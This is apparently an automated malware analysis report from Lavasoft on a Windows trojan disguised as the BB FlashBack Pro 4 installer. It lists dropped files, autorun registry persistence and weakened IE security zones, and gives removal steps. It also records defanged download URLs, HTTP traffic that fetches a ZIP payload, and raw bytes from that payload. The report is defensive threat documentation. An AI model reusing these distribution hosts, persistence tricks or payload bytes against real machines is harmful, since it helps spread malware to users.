Trojan.Win32.Reconyc.evlt (Kaspersky), Gen:Heur.Bodegun.1 (AdAware), Trojan.NSIS.StartPage.FD (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ea46ee27e1fbe7bf9d39c136fcdea33b
SHA1: 78527b3aa327fb1277b7ae132d9a1e97327f1764
SHA256: 8b7027c5ee801e063e6af99f0d2d1d352437cb8349d0fa02d0d0c964871dfbb8
SSDeep: 196608:MVBP5t/xcm9ZJiPy/puWpqC8NtYIYW8D8I W5ovz6NGzsTYlZA/D:sxlnRfpq38X z gA
Size: 14517248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-10-02 20:03:56
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
%original file name%.exe:1752
TempSetup.exe:444
Tempbbflbk4.exe:1908
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexShimCacheMutex
File activity
The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
The process TempSetup.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)
The Trojan deletes the following file(s):
%WinDir%\system\server.zip (0 bytes)
The process Tempbbflbk4.exe:1908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 25 AC 30 77 FD 4A 76 15 97 F6 E4 E4 68 77 FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempsetup.exe" = "Axlio"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempbbflbk4.exe" = "Tempbbflbk4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process TempSetup.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 6F 40 B1 3F 39 FB 7D 9E 9F 45 30 20 C6 AD 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"
The process Tempbbflbk4.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 73 92 E8 EF C5 E5 F9 27 5C 31 BB 81 03 62 D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| c9f5d0c41112ff0c018c8f3944baf5a2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\TempSetup.exe |
| 13cc92f90a299f5b2b2f795d0d2e47dc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\AdvSplash.dll |
| 9b3f214936612cb31aee3085f818bb72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\System.dll |
| 7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\UserInfo.dll |
| c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\nsDialogs.dll |
| 84a536dc4aa2fb1e4c3f222f159d3efe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Tempbbflbk4.exe |
| 54ca76d64d0fbf64eefa3fbf73887e2f | c:\WINDOWS\system\svchost.exe |
| dc17d30ae1fd630ead4819da1819ccc4 | c:\WINDOWS\system\taskhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Blueberry
Product Name: BB FlashBack Pro 4
Product Version: 4.1.9.3121
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.1.9.3121
File Description:
Comments:
Language: Language Neutral
Company Name: BlueberryProduct Name: BB FlashBack Pro 4Product Version: 4.1.9.3121Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 4.1.9.3121File Description: Comments: Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 14509028 | 14509056 | 5.54197 | d2c2bf6da3ad0d8988279f5138ddf34f |
| .sdata | 14524416 | 312 | 512 | 1.39815 | 077dbbcfff33679972bcd7d68127604f |
| .rsrc | 14532608 | 5714 | 6144 | 3.92205 | bc7ff4cb126dd668e0bb174c688bde70 |
| .reloc | 14540800 | 12 | 512 | 0.070639 | 26d09530a29582b5b0c45401afd333b8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://customtshirtsandhoodies.org/koxoa/meomu.txt | 184.154.45.211 |
| hxxp://songbienkhoipharma.com/images/advers/images/meomu.zip | 125.212.220.231 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /images/advers/images/meomu.zip HTTP/1.1
Host: songbienkhoipharma.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 02:56:49 GMT
Server: Apache/2
Last-Modified: Wed, 30 Sep 2015 14:55:48 GMT
ETag: "286f9a-c396-520f8203b30e2"
Accept-Ranges: bytes
Content-Length: 50070
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/zip
PK........).&Gd........`......svchost.exe{(............i...u...F._;9.b......0%..m.o).....>...D.9T.X.{..b....m..@.....L2.S...u......1.ML.f.....[.'.YuPBqP.o..&[...2....7&./'.b..n.......E.q.e|...-4..k].=!.h.D.mq.bC....Z..l!......~...(.U..}.>u!.t.4lu..D8.l..y..w...\ .Q.2....$_0...d.6^...'9..._.0<.....&...0..y..H.S.z....=,.....hE..]3~KC.....|.-.".......d.K.<...!k8.v.4.e?"9...UU.A..-#.7jDc.. .O...m.Lx....'....Sc......,......5..`.....G..u6..."....T......J...oE..s3=C...0J..K-....]q8q.....(...-........#9..)..,...HUC........;.?RC..Q........;...?)..W.......Ku......*/.^s.vt..F.M.]$.!.bT...G.3.aPu.......d..g..)......5....K.`..wM.?c..6.G....h...b.)..C..s.M4..;.g.......U1D.(.8..xS..(.q.3Q.(*N .@......jc. 1...5....R&....^..;..G...C.s...Th........OT...vl.i.=.o.....7.Z...K.W.......r.....7S.......$8....D..a.. ........x..:DCI{..nN....4....J.....W.x.....7L......e...r....:.0\.kK.......jr<.....@.J......0..J..)......N ._z.....K.......}.-.......<.....xASO[..9....dyo>.n8Y..K,........."g'F..a9....[...eK......t.`5...........{Lv.?..s$.Hx....6hN..9.a.q..w......H.*....k.RW8....,...J0.....p.c%..f..........2.4.....V.3...Y..:.-.k...ThE.pF..,..g`f....R..._.0....^.........s..T...$y......o.Zc.P%..2...$.a..TD....\..).:...[........,....-......t....@.f.,stl../.'..~/.*F]...&3g.P....i....W.....mNj.u..K..t.... ...y....'..u..%...;mp.8...-..d@CF..i.y.\..LA...Fv... ....|. ....[...2.g........D.7...mX*W.m..e4..q....j.......&....L....C..Rx..6....^ .]...~..`.8..1.....yD.....".....SV/.)...n..*...[..].Cx.1.......CFU.(....$L.."...g..dn..x....
<<< skipped >>>
GET /koxoa/meomu.txt HTTP/1.1
Host: customtshirtsandhoodies.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 03:06:32 GMT
Last-Modified: Wed, 30 Sep 2015 15:06:23 GMT
ETag: "3c26d2-3c-520f8461eeb4f"
Content-Length: 60
Vary: User-Agent
Content-Type: text/plain
X-Varnish: 326474024
Age: 0
X-Cache: MISS
Connection: keep-alive
Accept-Ranges: bytes
hXXp://songbienkhoipharma.com/images/advers/images/meomu.zipHTTP/1.1 200 OK..Date: Thu, 29 Oct 2015 03:06:32 GMT..Last-Modified: Wed, 30 Sep 2015 15:06:23 GMT..ETag: "3c26d2-3c-520f8461eeb4f"..Content-Length: 60..Vary: User-Agent..Content-Type: text/plain..X-Varnish: 326474024..Age: 0..X-Cache: MISS..Connection: keep-alive..Accept-Ranges: bytes..http://songbienkhoipharma.com/images/advers/images/meomu.zip..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Tempbbflbk4.exe_1908:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
logging set to %d
logging set to %d
settings logging to %d
settings logging to %d
created uninstaller: %d, "%s"
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Error registering DLL: %s not found in %s
Exec: failed createprocess ("%s")
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: success ("%s")
Exec: command="%s"
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
Exch: stack
RMDir: "%s"
RMDir: "%s"
MessageBox: %d,"%s"
MessageBox: %d,"%s"
Delete: "%s"
Delete: "%s"
File: wrote %d to "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename failed: %s
Rename on reboot: %s
Rename on reboot: %s
Rename: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
SetFileAttributes: "%s":X
Sleep(%d)
Sleep(%d)
detailprint: %s
detailprint: %s
Call: %d
Call: %d
Aborting: "%s"
Aborting: "%s"
Jump: %d
Jump: %d
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
install.log
install.log
%u.%u%s%s
%u.%u%s%s
Skipping section: "%s"
Skipping section: "%s"
Section: "%s"
Section: "%s"
New install of "%s" to "%s"
New install of "%s" to "%s"
RegDeleteKeyExA
RegDeleteKeyExA
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
Delete: DeleteFile("%s")
%s=%s
%s=%s
*?|/":
*?|/":
invalid registry key
invalid registry key
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
x%c
x%c
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
operator
operator
kernel32.dll
kernel32.dll
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
PendingFileRenameOperations
PendingFileRenameOperations
c:\dev\PCWinCam\BCB6-new\RemPendingFileOp\Output\RemPendingFileOp.pdb
c:\dev\PCWinCam\BCB6-new\RemPendingFileOp\Output\RemPendingFileOp.pdb
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
RemPendingFileOp.dll
RemPendingFileOp.dll
:*:5:9:>:
:*:5:9:>:
.reloc
.reloc
UserInfo.dll
UserInfo.dll
System.dll
System.dll
callback%d
callback%d
ZE[.LVF.
ZE[.LVF.
%o.MA
%o.MA
nsi3.tmp
nsi3.tmp
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll" (overwriteflag=1)
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll" (overwriteflag=1)
p\nsDialogs.dll"
p\nsDialogs.dll"
\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"
%Program Files%\Blueberry Software\BB FlashBack Pro 4
%Program Files%\Blueberry Software\BB FlashBack Pro 4
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1
Tempbbflbk4.exe
Tempbbflbk4.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe
889848471
889848471
1245492
1245492
1245446
1245446
1359282841
1359282841
638190238
638190238
456789:0
456789:0
Nullsoft Install System v2.46
Nullsoft Install System v2.46
VVV.bbconsult.co.uk
VVV.bbconsult.co.uk
Remove File Pending Operations
Remove File Pending Operations
1, 0, 0, 1
1, 0, 0, 1
00000000
00000000
CompanyWebsite
CompanyWebsite
hXXp://VVV.bbflashback.com/
hXXp://VVV.bbflashback.com/
4.1.9.3121
4.1.9.3121
Tempbbflbk4.exe_1908_rwx_011C4000_00001000:
callback%d
callback%d